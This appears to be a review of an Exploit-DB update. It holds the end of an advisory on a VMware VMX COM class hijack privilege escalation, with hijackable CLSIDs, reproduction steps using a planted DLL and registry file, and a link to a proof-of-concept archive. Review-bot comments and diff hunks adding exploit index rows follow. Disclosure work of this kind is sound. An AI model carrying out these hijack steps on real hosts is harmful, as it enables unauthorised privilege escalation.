bcde0395-e52f-467c-8e3d-c4579291692e MMDeviceEnumerator class
cb8555cc-9128-11d1-ad9b-00c04fd8fdff WbemAdministrativeLocator Class
d68af00a-29cb-43fa-8504-ce99a996d9ea Microsoft WBEM (non)Standard Marshaling for IWbemServices
e7d35cfa-348b-485e-b524-252725d697ca PSFactoryBuffer
The majority of these are related to WMI and are probably not critical so could be removed, however MMDeviceEnumerator is used to find audio devices which is probably important. Also note that hijacking COM classes isnt necessarily the only resource which could be hijacked. From a fixing perspective I don't know of any documented way of preventing the lookup of COM classes from HKEY_CURRENT_USER other than running the process as an administrator, about all you can do is not use COM at all. As with the other bug Ive reported at the same time a more comprehensive fix would probably to not create the process as the desktop user, instead using another user identity, however that in itself has risks.
Proof of Concept:
Ive provided a PoC as a C++ project.
1) Compile the project, make sure to compile the x64 version of the DLL otherwise the PoC will fail.
2) Copy the compiled HijackDll.dll to the folder c:\hijack.
3) Install the hijack.reg file using REGEDIT or the command line REG tool. This setups up a hijack of the CB8555CC-9128-11D1-AD9B-00C04FD8FDFF class.
4) Start a VMX instance using the normal GUI or vmrun.
Expected Result:
The system COM class is loaded into the VMX.
Observed Result:
The VMX process loads the hijack DLL into memory and a dialog box appears proving the code injection.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46601.zip
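Review bot: `This setups up a hijack` should read `This sets up a hijack`, `a more comprehensive fix would probably to not create the process` is missing `be`, and `isnt`/`Ive` lack apostrophes. Step 2 hardcodes `c:\hijack` and step 3 references `hijack.reg`, both of which only exist in the archive behind the second `Proof of Concept:` heading; say so before the steps and rename the duplicated heading. The CLSID list is the most useful part of the entry for defenders, and the text's own recommendation (drop the WMI-related classes that are not needed, keep `MMDeviceEnumerator`) reads better as an explicit mitigation paragraph; a per-user registration under HKEY_CURRENT_USER for any of those seven class ids, while the VMX process runs at elevated integrity, is the condition worth alerting on. As with 46600, no CVE or fixed version is recorded.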

@ -10375,6 +10375,9 @@ id,file,description,date,author,type,platform,port
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows, 46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows, 46584,exploits/windows/local/46584.py,"DVD X Player 5.5.3 - '.plf' Buffer Overflow",2019-03-21,"Paolo Perego",local,windows,
46596,exploits/windows/local/46596.py,"X-NetStat Pro 5.63 - Local Buffer Overflow",2019-03-25,"Peyman Forouzan",local,windows,
46600,exploits/windows/local/46600.txt,"VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
46601,exploits/windows/local/46601.txt,"VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation",2019-03-25,"Google Security Research",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
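Review bot: the context rows in this hunk are rendered twice on one line (`46561,...,windows, 46561,...,windows,`), a side-by-side view artifact rather than data in the file, so the hunk cannot be read as the csv on disk; check the raw diff before merging. For the added rows, `46596` is dated `2019-03-25` while the header of `46596.py` says `2019-03-23`, and its description drops the `(EggHunter)` qualifier used in the file's title. `46600`/`46601` carry the author `Google Security Research` although the files themselves are first-person write-ups with no author line, so attribution is recoverable only from the csv. The empty port column is correct for all three, as they are local exploits.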
@ -41037,3 +41040,9 @@ id,file,description,date,author,type,platform,port
46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46591,exploits/php/webapps/46591.txt,"Matri4Web Matrimony Website Script - Multiple SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46592,exploits/php/webapps/46592.txt,"Meeplace Business Review Script - 'id' SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80 46593,exploits/php/webapps/46593.txt,"Inout Article Base CMS - SQL Injection",2019-03-22,"Ahmet Ümit BAYRAM",webapps,php,80
46595,exploits/multiple/webapps/46595.txt,"Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-25,"Ozer Goker",webapps,multiple,
46597,exploits/php/webapps/46597.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46598,exploits/php/webapps/46598.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46599,exploits/php/webapps/46599.txt,"Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46602,exploits/php/webapps/46602.txt,"Zeeways Jobsite CMS - 'id' SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
46603,exploits/php/webapps/46603.txt,"Zeeways Matrimony CMS - SQL Injection",2019-03-25,"Ahmet Ümit BAYRAM",webapps,php,80
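Review bot: same rendering artifact as the previous hunk (context rows duplicated on one line). For the added rows, `46595` has an empty port column although every request in the advisory targets `127.0.0.1:5984`; the port should be `5984`. The `46597` and `46599` descriptions say `SQL Injection` while the corresponding files are titled `Multiple Vulnerabilities` and include an authentication bypass, whereas `46598` does carry the `(Authentication Bypass)` qualifier; make the three consistent. Dates: `46595` is `2019-03-25` here against `22.03.2019` in the file, and `46597` is `2019-03-25` against `23.03.2019`; if the csv column is the publication date rather than the author's date, that convention should be stated in the csv header so the discrepancy is not read as an error.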